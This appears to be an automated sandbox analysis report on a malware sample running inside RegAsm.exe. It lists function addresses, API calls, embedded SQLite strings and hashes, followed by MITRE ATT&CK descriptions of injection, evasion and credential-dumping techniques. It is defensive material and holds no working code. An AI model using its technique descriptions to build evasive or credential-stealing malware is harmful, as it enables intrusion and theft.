Opcode Fuzzy Hash: 670fb3187c467741e8e8e8220a9650c127e7209cb59422902f7758fbd1448a52
Instruction Fuzzy Hash: 521115B1A09129FBEF109F95CC49DDE7F79EB04761F208144F824A62A1DB31EA50DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A729 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041A74F

Part of subcall function 0041A57B: __fltout2.LIBCMT ref: 0041A5A6

__cftog_l.LIBCMT ref: 0041A775
__cftoe_l.LIBCMT ref: 0041A7A7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 5caa51e322e81af1be4ceadbe4ea236f7c28ba83958f91cc1dc79586f8736deb
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: CE114B3600114ABBCF126E95CC458EE3F32BB1D354B598416FA2859171D33ACAB2AB86

Uniqueness

Uniqueness Score: -1.00%

Function 00410300 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
wsprintfA.USER32 ref: 0041034D

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction ID: db14e26b0bbffc5ca6930250cbb399bf26d4a56846ee06bee85017f3032141ff
Opcode Fuzzy Hash: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction Fuzzy Hash: 69F0BEBA900028BBC7149BDAAC499BFB7FDEF09B02F00514AFA4592180E7784950D3B4

Uniqueness

Uniqueness Score: -1.00%

Function 1C26BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1C26C1B5

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: e9d15c8926dccd09b051a5002ef848c88839cc32b108d3b5ccc7cb03e600d6f2
Instruction ID: fc2640efac5bf14d75afac230cc0754c895961a37ca70d565285ba6067824b4d
Opcode Fuzzy Hash: e9d15c8926dccd09b051a5002ef848c88839cc32b108d3b5ccc7cb03e600d6f2
Instruction Fuzzy Hash: CBA10875E097A78FE704AE288850756B7D1AF89220F240B5DFCE147BE1EB70D4C58AB1

Uniqueness

Uniqueness Score: -1.00%

Function 1C3778F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

?, xrefs: 1C37794A
*, xrefs: 1C377982

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 8dd77d5a6e56d75767da6176b219f7b3e6076309208c38dbc97ec5afb39f2681
Instruction ID: 1edb289936bd1905260d6a56b0203cd7adf03eb105f25579a52f491b03887d93
Opcode Fuzzy Hash: 8dd77d5a6e56d75767da6176b219f7b3e6076309208c38dbc97ec5afb39f2681
Instruction Fuzzy Hash: 2971E5B0A093518FE7178F29C88071BBBE6EF8A200F544A6DE985C7311D779D9458FB2

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?), ref: 0040689E
GetProcAddress.KERNEL32(?,?), ref: 00406978

Strings

)k@, xrefs: 0040693E, 00406892, 00406991

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: )k@
API String ID: 2574300362-940070785
Opcode ID: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction ID: c39d4b3fe26b647a66bf522e9f735de2ad8918ca6e8eb657aee87430fdef1d80
Opcode Fuzzy Hash: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction Fuzzy Hash: 69418EB17017059BDB20CF69D8807ABF3E8AF84315F1545BAD84EDB381E639E8258B54

Uniqueness

Uniqueness Score: -1.00%

Function 1C2655D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 1C26569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 1C2656D1

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 5afdd19f6f2a1bd377b4279e3c46e974c9efb9594cfbef2d16b6deb808dc73d7
Instruction ID: 604e7808fac7934986d6c4b6d88f65fa8b50b1d02fbdb833ddbe9a8439856158
Opcode Fuzzy Hash: 5afdd19f6f2a1bd377b4279e3c46e974c9efb9594cfbef2d16b6deb808dc73d7
Instruction Fuzzy Hash: 98314EF1B06233CBE7246E389DC999A7738E758265F310632FE07D6551D621C888C6F2

Uniqueness

Uniqueness Score: -1.00%

Function 0040F890 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F905
memcpy.MSVCRT ref: 0040F956

Part of subcall function 0040F7A0: std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Strings

string too long, xrefs: 0040F900

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction ID: b5ddb5f07250de15edbe22c83bac0e8ada76cede5f33fbd1d3110154bac4181d
Opcode Fuzzy Hash: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction Fuzzy Hash: E631F9333106105BE734AE5CA880A6AF7E9EF95720B20493FF581D7BC0C7799C488399

Uniqueness

Uniqueness Score: -1.00%

Function 1C34DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1C34DF4F
sqlite_stat1, xrefs: 1C34DF30

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: 937585273f2b5ebd6249d80d202a55a772bc1bcd6daa9ba870bc1912b91c1993
Instruction ID: e15289365097edc1e96ae2028492a94c6d0ec540ca6dbb7b4a5edcc91a56e881
Opcode Fuzzy Hash: 937585273f2b5ebd6249d80d202a55a772bc1bcd6daa9ba870bc1912b91c1993
Instruction Fuzzy Hash: 8221D075A053525BDB20DE26DC84E6AB7E8AF85724B25072CFC849B261D320EC15CFB7

Uniqueness

Uniqueness Score: -1.00%

Function 1C3E7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 1C3E7ED9

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 3b45aff375267efb8561dc503bb69cebb6e7b3cfa3759443f073621923b88b66
Instruction ID: f46a2224a4b8dcf2c3c66b78317af76b5d1d1bad68769f53647a87844368f106
Opcode Fuzzy Hash: 3b45aff375267efb8561dc503bb69cebb6e7b3cfa3759443f073621923b88b66
Instruction Fuzzy Hash: 8B21FFB1709231EBEB199FA8DC89F9B37B8EF58655F100624FA05D1190EB30D914DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 1C25141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 1C430E84
GetXStateFeaturesMask, xrefs: 1C430E34

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 85f19cfa0934c31f52b2d39179e4ba1db9d24ed28346027e8ae239f9d8db5d23
Instruction ID: 03e4fe96eb4a3aa1798b46d543876c26c492856e5b224fc7e99a193a235d175d
Opcode Fuzzy Hash: 85f19cfa0934c31f52b2d39179e4ba1db9d24ed28346027e8ae239f9d8db5d23
Instruction Fuzzy Hash: DF01D476649278B7CB112A958C06ECB3E25DBA87A2F005021FD0825310D6729820DAF4

Uniqueness

Uniqueness Score: -1.00%

Function 1C27F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1C27F752

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 3e6d02a8daebbcd89e958a918fb1b96c3a47c222f9513788e837caeff39c3c06
Instruction ID: 867510bdb41058d024fe6ad090f6eb50e4c2d0cc91948b0629ede08495701f00
Opcode Fuzzy Hash: 3e6d02a8daebbcd89e958a918fb1b96c3a47c222f9513788e837caeff39c3c06
Instruction Fuzzy Hash: FA1191F5608221EFE2149F69DCC9FAB33BCEB68615F100129F905D2151E774E858C6B6

Uniqueness

Uniqueness Score: -1.00%

Function 0040F580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F596

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

memmove.MSVCRT ref: 0040F5CF

Strings

invalid string position, xrefs: 0040F591

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction ID: 53bf75527ab3bf274367aba823a209b8e3b66f0f9231be3ffe00ec12181ebe73
Opcode Fuzzy Hash: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction Fuzzy Hash: 5F01DB32310250ABD734CD6CED8095AB3EAEBD5710B24493FE185DBB82D674DC4A87D8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

